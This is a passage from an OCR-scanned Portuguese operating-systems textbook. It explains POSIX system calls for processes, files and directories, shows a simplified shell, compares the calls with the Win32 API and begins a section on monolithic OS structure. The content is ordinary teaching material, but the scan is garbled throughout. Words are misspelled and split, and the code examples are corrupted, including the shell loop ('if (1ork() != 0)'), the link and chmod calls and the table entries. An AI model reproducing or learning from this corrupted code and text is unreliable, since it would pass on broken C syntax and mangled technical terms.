par a pilha, como se faz depois dc qualqucr chamada dc ro- 
tina (passo 11), Presumindo que a pilha crescc para baixo, 
como tnuiias vezes ocorre, o código compilado increniema 
o ponteiro da pilha exatamente o necessario para remover 
os parametros armazenados antes da chamada read. O pro- 
grama agora esta liberado para fazer o que quiser. 

No passo 9, foi por u ma boa razao quc dissemos "pode 
retornar para a rotina da biblioteca no espaęo do usuario*; 
a cha mada de sistema pode bloąuear quem a cha mon, 
impcditido-o de continuar. Por exemplo, se quem chamou 
estiver tentando ler do leclado e nada foi digitado ainda, cle 
sera bloqueado. Nesse caso, o sistema operacional verificara 
se algum outro processo pode ser executado. Depois, quan- 
do a entrada desejada estiver dispomyel, esse processo tera 
a atenęao do sistema e os passos 9 a 11 serao executados. 

Nas próximas seęoes estudai emos algurnas das chama - 
das de sistema em P0S1X tnais usadas dli, mais cspecifl- 
ca men te, as rotinas de biblioteca que realizam essas cha- 
madas de sistema. O POSIX tern cerca de ceni chamadas 
de rotina. Algumas das mais imponames estao listadas na 
Tabela 1.1, agrupadas, por conveniencia r em quatro cate- 
gorias. No texto examinaremos resumidamente cada cha¬ 
mada para entender o que cada nma delas faz. 

Os servięos oferecidos por essas chamadas determinam 
a maior parte do que o sistema operacional deve realizar, 
ja que o gerenciamento de recursos em eompmadores pes- 
soais e mmimo (pelo menos, se comparado a grandes ma- 
qninas com varios usuarios). Os servięos englobam coisas 


como criar c finalizar processos, criar, cxcluir, kr c csctcvcr 
arquivos, gerenciar diretórios c realizar entrada c saida. 

Convem observar qtie cm P05IX o map ca mc oto de 
chamadas de rotina em chamadas de sistema nao e de u ma 
para urna. O POSIX especifica varias rotinas quc um sis¬ 
tema cm conformidadc com csse padrao dcvc disponibili- 
zar, mas nao cspecilica se se trata de chamadas dc sistema, 
chamadas dc biblioteca ou qualqucr o utrą coisa. Se urna 
rotina pode ser executada sem invocar urna chamada de 
sistema (isto e, sem desviar para o nucleo), ele e exeatlado 
gerahrtente em modo usuario, por razóes de desempenho. 
Contudo, o que a maioria das rotinas P0S1X invoca sao 
chamadas dc sistema, emgeral com urna rotina mapeando 
diretamente u ma chamada de sistema, Em poucos casos — 
cm cspccial naqueles cm que divctsas rotinas sao somente 
peąuenas variaęóes urnas das outras — r urna chamada dc 
sistema e itwocada por mais de uma chamada de biblioteca. 

1.6-11 Chamadas de sistema para 
gerenciamento de processos 

O primeiro grupo de chamadas na Tabela 1.1 lida com 
gerenciamento de processos. A chamada fork c um bom 
ponto de partida para a disetissao, sendo o tinico modo de 
criar um novo processo ejn UNIX. Ela gera uma cópia exa- 
ta do processo original, incluindo todos os descritores de 
arquivo, registradores — nido. Depois de a chamada fork 
acontecer, o processo ongi na I e sua cópia (o processo pai 
e o processo filho) seguem camjnhos separados, Todas as 
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Gerentiamento de processos 


Chamada 

Descrięao 

pid = fork() 

Cna um processo filho identico ao pai 

pid = waitpid(pid r &stat!oCp options) 

Espera que um processo filho seja conciiido 

s = execve(name, argv, enwonp) 

Substitui a imagem do nucleo de um processo 

exit(sta1us) 

Conclui a execuęao do processo e devolve status 


Gerenciamento de arquivos 


Chamada 

Descrięao 

Fd = openffile, how,..,) 

Abre um arquivo para ieitura. escrita ou ambos 

s = closeffd) 

Fecha um arquivo aberto 

n = readtfd, buffer, nbytes) 

L§ dados a partir de um arquivo em um buffer 

n = writeffd, buffer, nbytes) 

Escreve dados a partir de um buffer em um arquivo 

position = l$eek(fd> offset, whence) 

Move o ponteino do arquivo 

s - stat(name, &buf) 

Obtem informaęóes sobre um arquivo 


Cerenciamento do sistema de diretório e arquivo 


Chamada 

Descrięao 

s = mkdirfname, modę) 

Cria um rwo diretório 

s = rmdir(name) 

Remove um diretório vazio 

s - linkfnamel, name2) 

Cria uma rwa entrada, name2 r apontando para namel 

s = unlinkjname) 

Remove uma entrada de diretório 

s = mount(special r narne, flag) 

Monia um sistema de arquivos 

s - umount(spęciai) 

Desmonta um sistema de arquivos 


Diversas 


Chamada 

Descrigao 

s - chdir(dirname) 

Altem o diretório de trabalho 

$ = chmodjname, modę) 

Mera os bits de proteęao de um arquivo 

s = kill(pid, signal} 

Envia um sinal para um processo 

seconds = time[&seconds] 

Obtem o tempo decorrido desde P de janeiro de 1970 


Tabela 1.1 Algumas das principais chamadas de sistema do POSIX, O código de retorno s ś-1 se um erro tiver ocorrido. Os 
códigos de retorno sao os $eguirrt#s: pid ó um processo id, fd e um descritor de arquivo h n e um confador de bytes. posiłion e uma 
compensaęao no interior do arquivo e seconds e o tempo decorrido. Os par&metros sao explicados no texto. 
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variaveis tętn valores identieos no momemo da chamada 
fork, mas, como os dados do processo pat sao copiados para 
criar o processo filho, mudanęas subseąuentes em um deles 
nao ale tam o outro. (O texto do pr ogra ma, que e inaltera- 
vcl, e compartilhado entrc processo pai e processo filho.) 
A chamada fcwic retorna um valor, quc ć zero no processo 
filho c igual a o identifieador dc processo (PID) do proces¬ 
so filho no processo pai, Usando o PSD retornado, os dois 
processos pudem verificar que um e o processo pai e que o 
outro e o processo filho. 

Na maioria dos casos, depois dc uma chamada fork, o 
processo filho precisara cxccmar um código diferente da- 
qudc do processo pai. Considcrc o caso do sbcll. Ele lc um 
comando do terminal, cria um processo filho, espera quc 
o processo filho execute o comando e, enlao, lc o próxiino 
comando ąuaiulo o processo filho termina, Para esperar a 
finalizaęao do processo filho, o processo pai executa urna 
chamada de sistema waitpid, que someme aguarda ale que 
o processo filho termine (qualquer processo filho, se exis- 
tir mais de um). A chamada waitpid pode esperar por urn 
processo filho especffico ou por um processo filho qual- 
quer atribuindo-se -1 ao pnmeiro parametro. Quando a 
chamada waitpid termina, o cndcrcęo apontado pelo segun- 
do parametro, statłoc. sera atribmdo como estado dc saida 
do processo filho (temiino normal ou anormal c valor de 
saida), Yarias opędes tambem sao oferecidas c especificadas 
pelo terceiro parametro. 

Agora, considere como a chamada fork e osada pelo 
shcil. Quando um comando e digitado, o sliell cria um novo 
processo. Esse processo filho dcvc cxecutar o comando 
do usuario, Ele faz isso usando a chamada dc sistema 
execve, que faz com que loda a sua imagem do niiclco seja 
substitiuda pelo arquivo cujo nonie esta cm seu primriro 
parametro. (Dc falo, a chamada de sistema em si e exec, 
mas varias rotinas de biblimeca diferemes a cha mam com 
diferentes parametros e nomes um pouco diferentes. Aqui, 
as t rai a rem os como chatmdas de sistema.) Um sliell muito 
simplificado que ilustra o uso das chamada s fork, waitpid e 
execve e mostrado na Figura 1.18. 


#deftne TRUE 1 

while (TRUE) ( 

lype _prompt(); 

read -.commandtcommand, parame 

if (1ork() != 0) { 

U Código do processo pai. J 
waitpid( “l.&status, 0): 

} else { 

i. Código do processo filho W 
execve(comnnand 1 parameters, 0); 

> 

} 


No caso maisgeral, a chama da execve possui tres pa ta me- 
tros: o nome do arquivo a ser executado, umpontciro para 
o arranjo de argumentos e um pontciro para o arranjo do 
ambiente. Esses parametros sera o descritos resumkiamen- 
te. Yarias roli nas de biblioteca — inclusive a execl, a mcv t a 
mele e a mm —sao fornecidas para que seja posstveI omi- 
tir parametros ou especifica-los de varias maneiras. Ao lon- 
go de todo este livro, usaremos o nome exec para represen- 
lar a chamada de sistema irwocada por todas essas rotinas. 

Consideremos o caso de um comando como 

cp arq1 arq2 

usado para copiar arql para arq2 . Depois que o shell 
criou o processo filho, este localiza e cxecuta o arquivo 
cp e passa para ele os nomes dos arquivos de origem e 
de destino. 

O programa principal dc cp (e o programa principal da 
maioria dos outros programas em C) contem a declaraęao 

main(argc, argv, envp) 

onde arge e um contador do mi mero dc itens na linha de 
comando, induindo o nome do programa, Para esse exem- 
plo, ar§c e 3, 

O segundo parametro, argv, e um pontciro para um 
arranjo. O element o / desse arranjo e um pontciro para a /- 
esima cadeia de caractercs na linha de comando. Em nosso 
exemplo, ^^[0] apontaria para a cadeia de caracieres J cp', 
ar$v[ 1] apontaria a cadeia de caractercs f arqT e argv[ 2] 
apontaria para a cadeia de caractercs 'arq2'. 

O terceiro parametro do main, mvp, c um pontciro 
para o ambiente, um arranjo dc cadcias dc caractercs quc 
contem atribuięocs da forma nome - vabr f usadas para 
passar para um programa informaędes como o lipo dc ter¬ 
minal e o nome do diretório Home. Ha procedimcntos dc 
biblioteca quc podem ser chamados por programas para sc 
obter variavds de ambiente, que nomalmente sao u sad os 
para customizar como um usuario quer executar cenas ta- 
refas (por cxemplo, a impressora-padrao a ser usada). Na 
Figura 1.18, nenhum ambiente e passa do para o proces¬ 
so filho; assim, o terceiro parametro de mm t um zero. 


/. repita para sempre * / 

L mostra prompt na tela ^ / 

/. IÓ entraóa do terminal * / 

L cria processo filho */ 

U aguarda o processo filho acabar * / 

/, execcta o comando # / 


I Figura 1.18 Um interpretador de comandos simplificado. Neste livro, presume-se TRUE como 1. 
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Se a chamada exec parecer-lhe complicada, nao se de- 
sespere; cla e (semantieamente) a mais eompIexa de to- 
das as chamadas de sistema em POSIK, Todas as ou t ras sao 
muito mais simples. Como urn exemplo das simples, tonsi- 
dece a cha ma da exlt, que os pro ces sos devem usar para ter- 
minar suą execuęao. Ela possui um parametru, o estado da 
safda (0 a 255), que e retornado ao processo pat via siatioc 
na cha mad a de sistema waitptd. 

Os processos cm UNJX tcm suas memórias divididas 
em ale tres segmentos: o segmento de texto (isto e, o 
código do programa), o segmento de dados {as variaveis) 
e o segmento de pil ha. O segmento de dados tresce para 
ci ma e a pilha cresce para baixo, eon formę mostra a Figura 
1.19. Entre eles lia urna lacuna de espaęo de endereęamen- 
lo nao usado. A pilha cresce aulomaticameme para dentro 
da lacuna, confomie se fizer necessario, mas a expansao do 
segmento de dados e feita medianie o uso explidto de urna 
cha ma da dc sistema brk, que especifica o novo endereęo no 
qual o segmento de dados ter mina. Co mu do, essa chama da 
nao e definida pelo padrao P0S1X, ja quc os programadores 
sao incentivados a usar a rodna de bibliotece malloc para 
alocar memória di. na mi ca men te, e a impkmentaęao subja- 
tente do malloc nao fot pianej a da para qtie fosse urna candi- 
data adequada a padronizaęao, pois poucos programa dores 
usam-na diretameme e e quesiionavel se algum deles ja 
percebeu que brk nao esta no POSIX. 


_ 1.6.21 CHamadas de sistema para 

gerenciamento de arquivos 

Mułtas chamadas de sistema estao reladonadas com o 
sistema dc arquivos. Ncsta seęao estu darem os as chamadas 
que operam sobrc arquivos individuais; na próxima, sera o 
abordadas as que envolvcm diretórios ou o sistema de arąiti- 
vos como um todo. 

Para ler ou escrever um arquivo r deve-se primeiro abri-lo 
usando open. Essa chamada especifica o nonie do arquivo a 
ser aberto, como um ca mi n ho [path name) absoluto ou re- 
laiivo ao diretório de trabalho e um código dc Q_RDQNLY f 
0_\VR0NLY ou 0_RDWR f significaudo abri-Io para Icitura, 
cscrita ou ambas. Para criar um novo arquivo, c usado o para- 
metro 0_CRHAT , O descritor de arquivos retornado pode, en- 
lao, ser usado para ler ou escreeer. Logo em segulda, o arqui- 
vopode ser fechado por ciosa quetoma odescótordearquivos 
dispomyel para reutiUzaęao em umopen subsequente, 


Endereęo (hex) 



Texto 


FFFF 


0000 


As chamadas mais intensivamente utilizadas sao, sem 
sombra de duvida, read e wilie* Vimos mad anteriormente, 
Write possui os mesmos pa ramo nos. 

Embora a maioria dosprogramas leia cescrcra arquivos 
seąuencialmente, alguris programas apiicativos precisam 
ter disponibilidade de acesso aleaiório a qualquer parte de 
um arquivo. Associado a cada arquivo existe um potueiro 
que indica a posięao atual no arquivo. Ao ler (cscrever) se- 
quencialmente J apoma-sc geralmente para o próximo by te 
a ser lido (escrilo). A chamada Iseek altera o valor do pon¬ 
teiro de posięao, para que chamadas subsequemes de read 
ou write possani comeęai cm qualquer ponto do arquivo t 

A chamada Iseek tern tres para met ros: o primeiro c o 
descritor dc arquivo; o segundo e urna posięcio no arqulvo 
c o tercciro infamia se a posięao no arquivo e rclativa ao 
Imcio, a posięao atual ou ao finał do arquivo. O valor re~ 
tornado pcla chamada Iseek c a posięao absolut a no arquivo 
(em bytes) de pois de allerar o ponteiro. 

Para cada arquivo, o UN1X registra o tipo do arquivo 
(arquivo regu tar, arquivo especial diretório etc.), o tama- 
nho e o momentu da ultima modificaęao, entre outras in- 
formaęoes. Os programas podem pedir para ver essa infor- 
maęao por meio da chamada dc sistema stat. O primeiro 
parametru dessa chamada especifica o arquivo a ser inspe- 
cionado; o segundo e um ponteiro para u ma estru tura ua 
qtial a informaęao devera ser colocada. As cliamadas fsłat 
fazem a mesma coisa por um arquivo aberto. 

i-6.31 Chamadas de sistema para 
gerenciamento de diretórios 

Ncsta seęao veremos algumas chamadas de sistema mais 
reladonadas com diretórios ou com o sistema dc arquivos 
como um todo, do que com um arquivo especffico, como 
na seęao anterior. As duas primdras chamadas, mkdir c rmdir, 
respeaivamentc, criam e apagani diretórios vazios. A próxi- 
ma chamada e a link. Seu intiuto e t^ermitir qtie um mesmo 
arquivo apareęa com dois ou mais nomes, indusive cm di¬ 
retórios diferentes* Um uso lipico da chamada link c permilir 
que varios membros da mesma equipe de programaęao com- 
pariilhem um arquivo comum, cada um deles tendo o arqni- 
vo aparecendo em sen próprio diretório, possivelmeme com 
diferemes nomes. Comparlilhar um arquivo nao e o mesmo 
que dar a cada membro da equipe urna cópia privada, mas 
significa que as mudancas feitas por qualquer membro dessa 
equipe ficam instantaneamente visfveis a os out ros membros 
— ha somente um arquivo. Quando sao feitas cópias de um 
arquivo compartilhado, as mudanęas subseguentes para urna 
cópia especifica nao a fet a m as outras. 

Para vermos como a chamada link funciona, considere 
a situaęao da Figura 1.20(a}. Ali estao dois usuarios, ast e 
jim; cada um possui sens próprios diretórios com alguns ar- 
quivos. Entao, se ąst cxecutar um programa que contenha 
a chamada de sistema 


Figura 1.19 Os processos tem tres segmeotos: teseto, dados e pilha. 


I ink{7usr/jim/memo 1J , 7usr/ast/note >J ); 
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/usr/ast /usr/jim 


16 

correio 


31 

bin 

81 

logos 


70 

memo 

40 

tesle 


59 

f.c. 
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(a) 

Aisr/ast /usr/jim 


16 

correio 


31 

btn 

81 

jogos 


70 

memo 

40 

teste 


59 

f.c. 

70 

nota 


38 

progi 


(M 

I Figura 1.20 (a) Dois diretórios ant es do link de /usr/jim/ 
memo ao drretórlo ast, (b) Os mesnnos diretórios dapois 
desse link. 

o arquivo memo no diretório de jim es tara agora aparecen- 
do no diretório de ast com o nome notę * A par lir de en ta o, 
fusr/jim/memo e fusr/astfnote ref erem-se a o niesmo arquivo, 
Vale notar qne ma mer os diretórios de u su ario em fusr , 
Juser, (korne ou em algiim outro lugar e simplesmenie urna 
dedsao tornada pelo admimstrador local do sistema. 

Entender como a cha mada link fimciona provavelmen- 
te esclarecera o que da faz. Todo arquivo em UXIX tern 
um mimero unico, sen i-numero, que o identifica. Essc 
i-numero ć um nidicc em urna tabela de i-nodes, um. por 
arquivo, informando quem possui o arquivo, onde sens 
blocos de disco estao, e assim por dianie* Um diretório e 
simplesmente um arquivo contendo urn conjunto de pa- 
res (i-numero, nome em ASCII). Nas primeiras versoes 
do UN T IX, cada enirada de diretório era de ló bytes — 2 
bytes para o i-numero c 14 bytes para o nome. Agora, 6 
necessaria u ma estrutura niais complcxa para dar su porte 
a nom es longos de arquivos J mas, coneciumlmenie, um di- 
retório ainda e um conjunto de pares (i-uumero, nonie em 
ASCII). Na Figura 1.20, correiotem o i-numero ló, eassim 
por dianie. O que a chamada link faz e simplesmente criar 
unia nova entrada de diretório com um nome (possivel- 
mente novo), nsando o i-numero de um arquivo cxistcntc, 
Na Figura 1.20fb), duas eniradas tern o mesmo i-mi mero 
(70) e, porta ino, fazem referenda ao mesmo arquivo. Se 
unia das duas e removida pośleriorniente r usando-se urna 
chamada de sistema unlink, o outro arquivo permanece. Se 
a mb os forem removidos, o UNIX percebcra quc nao ha en- 
tradas para o arquivo fum campo no i-node registra o mi¬ 
mero de entradas de diretório apontando para o arquivo), 
e entao o arqnivo e removido do disco. 

Conformę mencionado anteriormenie, a chamada de 
sistema mount permite que dois sistemas de arquivo sejam 
unificados. Unia situaęao comum e ter em disco rfgido o 


sistema de arquivos-raiz contendo as versoes binarias (exe- 
cutaveis) dos comandos comuns e outros arqnivos inten- 
sivamente usados. O usnario pode, entao, inserir um dis- 
quete com arquivos a serem lidos na imidadc de CD-ROM. 

£xeaiiando a chamada de sistema mount, o sistema 
de arquivos do disco ffexfvd pode ser anexado ao sistema de 
arquivos-raiz, conforme mostra a Figura 1.21. Um coman- 
do tfpico em C para realizar essa inoiitageui e 

mount(Vdev/fdOX 7mnt", 0); 

no qual o primciro para metro e o nome de um arquivo 
especial de blocos para a unidade dc disco 0, o segundo 
parametru e o local na arvore onde dc sera momado c o 
tercciro parametro informa se o sistema de arquivos deve 
ser momado como leitura e cscrita ou apenas para leitura. 

Dcpois da chamada mount, pode-se ter acessoa um ar- 
quivo na unidade dc disco 0 apenas nsando seu caminho 
a parlir do diretório- rai z ou do diretório de trabalho, sem 
sc preocuparcom qual unidade dc disco isso sera kito* Na 
verdade, a segunda, a tcrceira c a quarta unidades de disco 
tambćm podera ser montadas cm ąuakjuer lugar na arvo- 
re. A chamada mount iorna posswel integrar mcios terno- 
vfvcis a urna unica hierarquia integrada de arquivos, sem 
a necessidade dc saber em qual unidade se encomra um 
arquivo. Embora esse exemplo tratę espedfi ca nieme de 
unidades de CD-ROM, podemos momar tanibem poręóes 
de discos rfgidos (muitas vezes chamadas de partięoes 
ou dispositivos secundarios) desse modo, assim como 
com discos rfgidos extcmo$ c dispositivos sitek USB. Quan- 
do nao for rnais ncccssaiio, urn sistema dc arquivos po de¬ 
ra ser desmontado com a chamada de sistema umouni. 

1-6.41 Outras chamadas de sistema 

Existe inna vanedade de outras chamadas de sistema, 
Estudaremos apenas quatro delas aqui. A chamada cftdir al- 
tera o diretório atual dc trabalho. Dcpois da chamada 

chd i r(7usr/ast/test"); 




I Figura 1*21 (a) O sistema de arquivos antes da montagem. 
(b) O sistema de arquivos depois da montagem. 
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u ma abertura do arquivo xyz abrira Jusr/astJtestfxyz. O 
eon celto de diretório de trabalho elimina a necessidade 
de digitar (longos) nomes de caminhos absolut os a todo 
monie n to. 

Em UNIX, todo arquivo tem um anodo para prote- 
ęao, Esse modo inclui os bits ldtura-estrHa-execiięao para 
o proprieiario, para o grupo e para os outros. A chamada 
de sistema chmod possibiliia a aheraęao do modo de um 
arquivo. Por exemplo, para definir um arqiiivo como so- 
meme leitura para todos, exceto seu proprietario, poderia 
ser executado 

chmodCarp", 0644); 

A chamada de sistema kili c a maneira que os usuarios 
e seus proccssos tem para eiwiar sinais, Se urn processo 
esta preparado para capturar um sinal em particular, entao 
u ma rotina de tratamento desse sinal e executada quando 
de chega. Se o processo nao esta preparado para tratar um 
sinal, entao sita chegada 'mata' o processo (e r por conse- 
guinte, o nonie da chamada). 

O POSlX define varias rotinas para lidar com o tempo. 
Por cxcmplo, a chamada time ret orna o tempo arna! cm 
segundos, com 0 correspondendo a meia-noite dodia 1 - de 
Janeiro de 1970 (como se nesse instante o dia esiivesse co- 
meęando, e nao terminando). Em compuladores com pa¬ 
la vras dc 32 bits, o valor maximo que a chamada time pode 
retornar ć 2 n - 1 segundos (supondo que esteja usando in- 
teiros sem sinal). Esse valor corresponde a pouco mais de 
136 anos. Assim, no ano 2106, os sistemas UNIX de 32 bits 
irao emrar cm pane, como o famoso bug do milcnio em 
2000, que fol eviiado graęas aos grand es esEoręos da ind us¬ 
tna de TI para corrigir esse problema. Se voce atualmente 
possui um sistema UNIX de 32 bits, aconsclho-o a troca-lo 
por um dc 64 bits cm algum momcmo antes dc 2106, 

1-6.51 A API Win32 do Windows 

Atc aqui temos nos eon cent rado prindpalnientc no 
UN1X, Agora ć a vez de estudarmos resimiidamenie o 
Windows. O Windows e o UNTX diferem de unia manei- 
ra fundamemal em sens respectivos modelos de progra¬ 
maęao. Um programa IMIX consiste em um código que 
faz urna coisa ou outra, executando chamadas de sistema 
para rea-Iizar certos semęos. Por outra lado, um programa 
Windows c norma 1 me me dirigido por evenios — o pro- 
grama principal espera acontecer algum evciuo e entao 
chama urna rotina para trata-to. Eventos Liptcos sao teclas 
sendo pressionadas, a movimentaęao do rnouse, um botao 
dc mouse sendo pressionado ou um disco flexiVd sendo 
inserido. Os manipuladores (handters) sao, entao, cha ma- 
dos para processar o evento, atualizar a tcla e o estado 
interno do programa, De modo geral, isso leva a um estilo 
de programaęao diferente daąuele do UN1X, mas, como o 
foco deste livro e a funęao e a estru tura do sistema opera- 
cional, esses diferentes modelos de programaęao nao nos 
imeressarao rnuilo* 


£ daro que o Windows lambem tem chamadas de sis¬ 
tema. Em UN1X, ha quase um relaoonamenio de 1-para-1 
entre as chamadas de sistema (por exemplo, read) e as ro- 
tinas de biblioteca (por exemplo, read ) usndas para uiYocar 
as chamadas dc sistema, Em outras palavras r para cada cha¬ 
mada dc sistema ha, grosso modo, urna rotina de biblioteca 
quc e chamada para invoca-la, conformc indica a Figura 
L17. Alem disso, POSIK possui somente cerca de cem cha¬ 
madas de rotina. 

Com o Windows, a siluaęao e radicalmente diferen¬ 
te. Para comeęar, as chamadas de biblioteca c as chama¬ 
das reais ao sistema sao bastante desacopladas. A Microsoft 
definiu um conjimto dc rotinas, denominado API Win32 
(applkation program interface — interface do programa de 
aplitativo), para qtte os program a dor es tivessem acesso aos 
servięos do sistema ope ra cional. Essa interface tern sido 
(parciaimcntc) suportada cm todas as vers5es do Windows 
desde o Windows 95. Desacoplando-se a interface das cha¬ 
madas reais ao sistema, a Microsoft detem a capacidade de 
mu dar as chamadas reais ao sistema quando bem entender 
(atć dc vcrsao para vcrsao) sem invaiidar os programas cxis- 
tentes. O que realnie me consiiiui o subsisiema win 32 e um 
pouco ambfguo, ja que o Windows 2000, o Windows XP e o 
Windows Vista tem multas chamadas novas que nao esta- 
vam ameriormeme disponweis, Nesta seęao, Win32 signi- 
lica a interface suportada por todas as versoes do Windows. 

O nu mero dc chamadas da API Win 32 e extremainen- 
tc grandę, chegando a milhares. Alem disso, enquanto 
muitas delas iiwocam chamadas de sistema, urna quaniida- 
de subsiancial e executada totaimente no espaęo de usua- 
rio. Como consequencia disso, no Windows e imposswei 
ver o que e uma chamada de sistema (isio e, realizada pelo 
nucleo) e o que constitui simplesmente uma chamada de 
biblioteca do espaęo de usuario. Na verdade, o que e uma 
chamada de sistema em uma versao do Windows pode ser 
executado no espaęo de ustiario em uma versao diferente e 
vice-versa. Quando disentirmos as chamadas de sistema do 
Windows nesle livro, usaremos as rotinas Win32 (onde for 
apropriado), ja quc a Microsoft garante que essas rotinas 
permancccrao cstaveis com o passar do tempo. Mas c bom 
Icrubrar quc nem todas das sao vcrdaddras chamadas de 
sistema (isto e, desviam o controle para o nucleo), 

A API Win 32 tern um nu mero imenso de chamadas 
para gcrcndar jandas, figuras gcomctricas, texros, fonres 
de caractercs, barras de rolagem, caixas dc dialogos, menus 
e outros aspectos da interface grafica GUL Com o intuilo 
de estender o subsistema gra fi co para executar em modo 
nucleo (o que e valido para algumas yersoes do Windows, 
mas nao para todas), a interface grafica GUI e composta 
de chamadas de sistema; do contrario, elas conteriam apenas 
chamadas de biblioteca. Devenamos discutir essas chama¬ 
das neste livro ou nao? Como elas nao sao realmeme rela- 
donadas com a funęao de sistema operacional, deddimos 
que nao, mesrno sabendo que elas podem ser executadas 
pelo nucleo. Leitores imeressados na API Win32 podem 
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consultar um dos muitos livros sobre o assunio, como, 
por exemplo r Harl (1997), Rector e Newcomer {1997} e 
Simon {1997). 

Ja que introduzir todas as chamadas da interface A Pi 
Win32 esta fora de questao, dcaremos limitados as chama¬ 
das qtie correspondem, grosso modo, a fundonalidade das 
chamadas UMIX relacionadas na Tabela 1.1. Elas esiao enu- 
meradas na Tabela 1.2. 

Vamos agora percorrer rapidamente a lista da Tabela L2, 
CreateProcess cria um novo processo; funtiona como u ma 
combinaęlo de fork e de execve em UNIX. Possui muitos para- 


UNIK 

Win32 

Descrięao 

fork 

CreateProcess 

Cria um novo processo 

waitpid 

WailForSingleObject 

Pode esperar que um 
processo saia 

execve 

(nenhuma) 

CreateProcess = fork + 

execve 

exit 

ExitProcess 

Conclui a execuęao 

open 

CreatsFile 

Cria um arquivo ou abre um 
arquivo existente 

close 

Close Handle 

Fecha um arquivo 

read 

Read File 

Ledadosapartirdeum 

arquivo 

write 

WriteFile 

Escreve dados em urn 
arquivo 

Iseek 

SetFilePointer 

Move o ponteiro do arquivo 

stat 

GetFileAtthbutesEx 

Obtem varios atributos do 
arquivo 

mkdir 

CreateD irectory 

Cria um novo diretório 

rmefir 

RemoveDirectory 

Remove um diretório vazso 

link 

(nenhuma) 

Win32 nao da su porte a links 

unlink 

DeleteFile 

Destrói um arquivo existente 

mount 

(nenhuma) 

Win32 nao dś suporte a mount 

urnount 

(nenhuma) 

Win32 nSo d j suporte a mount 

chdir 

SetCurrent Directory 

Al tera o diretório de trabaiho 
atual 

chmod 

(nenhuma) 

Win32 nao dó suporte a 
seguranęa (embora o NT 
suporte) 

kill 

(nenhuma) 

Win32 nao da suporte a sinais 

time 

GetLocalTime 

Obtem o tempo atual 


I Ta be la 1.2 As chamadas da APl Win32 que correspondem 
aproxrmadamente £s chamadas do UNIK da Tabela 1.1. 


metros que especifkam as propriedades do processo recente- 
mentc criado. O Windows na o tern unia hierarąuia de proces- 
sos como o UN1X: portanto, nao ha o conceito de processo pai 
e processo filho. Depois que um processo foi criado, o criador 
c a cria tura sao iguais. WaitForSśngleObjsct e usada para espc- 
rar por um cvcnto. £ posavel esperar muitos cventos com 
cssa cha ma da. Se o para metro espedficar um processo, en ta o 
quem chamou esperara o processo espccificado sair, o que e 
fdto usando ExitPncce$$, 

As próximas seis chamadas operam sobre arquivos e 
sao funcionalmeme similares a suas corrcspondentes do 
UNIX, embora sejam diferentes ąuanto aos parametros c 
alguns detalhes, Alcmdisso. os arquivospodcm ser abertos, 
fe cha dos, lidos e cscritos dc um modo miii to similar ao do 
U NIK, As chamadas SetRePcintere GetFi le Attri butes Ex alteram 
a posięao no arquivo e obtem alguns atributos dc arquivo, 

O Windows possui diretórios que sao criados e removi- 
dos com CreateDirectory e RernoveDrectory, respęctivamente. 
Ha tambem a noęao de diretório atual, determinada por 
SetCurrentDirectory. O tempo atual e obtido porGetLocalTirm 

A interface Win32 nao tern links para arquivos r nem 
sistemas de arqulvos mon ta dos, nem seguranęa ou sinais. 
Portanto, essas chamadas, corrcspondentes as chamadas 
on UNIX, nao existem, Ż claro que o subsistema Win32 
possui urna grandę puantidade de chamadas que o UN1X 
nao tern, especialmente para gerenciar a interface grafica 
GUL c o Windows Vista tern um elaborado sistema de segti- 
ranęa e tambem da su porte a links (ligaęocs de arquivos). 

Por firn, talvez seja melhor fazer uma observaęao sobre 
o subsistema Win32: de nao e nma interface totalmente 
uniforme e consistente. A principal acusaęao contra ele e a 
necessidade de compatibilidade retroativa com as interfa- 
ces de 16 bits antigamente usadas no Windows 3 + x* 



Estrutura de sistemas 
operacionais 


Agora que Uvcmos urna visao externa de urn siste¬ 
ma operaciona! — isto e, da interface dele com o progra- 
mador —,eo momento de olharmos para su a estru tura 
interna. Nas próximas seędes, vamos examinar cinco di- 
feremes estruturas de sistemas operacionais, para termos 
uma ideia do espcclro dc possibi lida des, Isso nao sigm fi ca 
quc esgotarcmos o assunio, mas que daremos uma ideia 
sobre alguns projeios que tern sido usados na prał i ca. Os 
scis grupos aboidados serao os seguimes: sistemas mono¬ 
lit! cos, sistemas dc camadas, micronucleo, sistemas dien- 
te-servidor, miąuLoas virtuais c exonucleo. 


1-7-1 I Sistemas monoliticos 

A organizacjo monolitica 6 de longc a mais comnm; 
nesta abordageni, o sistema operaciona! intciro e exccula¬ 
do como um unico program a no modo nucko, O sistema 
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operacional e escriio como inna coleęao de rotinas, liga- 
das a lim unico grandę programa binario executavel. Nes- 
sa abordagem, ca da rotina do sistema tem urna interface 
bem dcfinida quanto a parametros e rcsuhados c ca da unia 
delas e livre para cha mar qualquer outra, se osia ofcreccr 
algurna compiuaęao lilii de que a primeira necessite. A 
exisleneia de milhares dc rotinas que podem chamar umas 
as outras sem restrięao muitas vezes leva a dificuldades de 
compreensao do sistema. 

Para construir o pr ogra ma-objęto real do sistema 
operacional usando essa abordagem, primeiro compilam- 
-sc todas as rotinas iiidWidualmeme (on osarquivos que 
conteni as rotinas}. Entao, jurnam-se lodas em um unico 
arquivo-objeto usando o ligador (linker) do sistema. Nao 
existc essencialmente ocidtaęao de informaęao; lodas as 
rotinas sao visiveis umas as out ras (o oposto de urna es¬ 
tru i u ra de módulos ou pacotes, na qual tnuito da infor- 
maęao e ocultado dentro de móduios e somenie os pornos 
de cni rada design ados podem ser chamados do lado dc 
fora do modulo). 

Contudo, mesmo cm sistemas monoliticos, ć possivd 
ter um niuhmo de estru tura. Os semęos (chamadas de sis¬ 
tema) providos pelo sistema operacional sao requisitados 
colocando-se os parametros em um local bem definldo (na 
pilha r por exemplo) e, entao, exeaitando uma instruęao de 
desvto de controle (trap). Essa instruęao chaveia a maąuina 
do modo usuario para o modo nudeo e transfere o contro¬ 
le para o sistema operacional, mostrado como passo 6 na 
Figura 1.17. O sistema operacional busca entao os parame- 
tros e determina qual cha mada de sistema sera executada. 
Depois disso, ele indesa uma tabela que contem na linha k 
um ponteiro para a rotina que executa a chama da de siste¬ 
ma k (passo 7 na Figura 1.17). 

Essa organizaęao sugere urna estru tura basica para o 
sistema operacional: 

1. Um programa principal que invoca a rotina do ser- 
vięo reqinsitado. 

2. Um conjunto de rotinas de servięo que executam as 
chamadas de sistema, 

3. Um conjunto dc rotinas utilitarias quc auxiliam as 
rotinas de scrvięo. 

Scgundo esse model o, para ca da cha ma da de sistema 
ha uma rotina de servięo quc sc cncarrega cicla. As roi i - 
nas utilitarias rca lizani iarefas necessarias para as varias 
rotinas de semęo, como buscar dados des programas dos 
